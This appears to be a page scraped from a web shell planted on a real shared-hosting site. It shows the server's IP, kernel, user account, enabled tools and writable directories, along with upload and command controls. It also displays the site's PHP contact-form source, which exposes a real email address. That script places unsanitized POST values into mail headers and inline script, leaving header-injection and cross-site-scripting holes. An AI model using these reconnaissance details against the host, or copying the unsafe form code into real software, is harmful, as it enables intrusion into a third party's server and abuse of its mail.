Private
Server IP : 68.178.168.24  /  Your IP : 3.137.213.117
Web Server : Apache
System : Linux 24.168.178.68.host.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User : realcarecert ( 1247)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/realcarecert/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/realcarecert/www/mailss.php
<!--- ===== start contact form section ===== --->
<?php
if(isset($_POST['contact'])){
   

    $Subject = 'Contact Us (realcert)';
    $ToEmail = 'meenakshifivedesign@gmail.com';
    $me=$_POST['name'];
    $mailheader = 'From : '.$_POST['email'].'\r\n';
    $mailheader .= "Reply-To: ".$_POST["email"]."\r\n";
    $mailheader = "MIME-Version: 1.0" . "\r\n";
    $mailheader .= "Content-type:text/html;charset=UTF-8"."\r\n";
    $MESSAGE_BODY= "";
    $MESSAGE_BODY .= "Name :- ".$_POST["name"]."<br>";
    $MESSAGE_BODY .= "Email :- ".$_POST["email"]."<br>";
    $MESSAGE_BODY .= "Message :- ".$_POST["message"]."<br>";    
	    $MESSAGE_BODY .= "contact :- ".$_POST["contact"]."<br>"; 
		    $MESSAGE_BODY .= "subject :- ".$_POST["subject"]."<br>"; 
    if(mail($ToEmail, $Subject, $MESSAGE_BODY, $mailheader)){
        echo "<script> alert('Thank you " .$me. " your message was sent'); </script>";
        echo "<script> window.location.href='contact.php'; </script>";
    }else{
        echo "<script> alert('Mail Not send'); </script>";
        echo "<script> window.location.href='contact.php'; </script>";
    }
}
?>
<!--- ===== End contact form section ===== --->
Private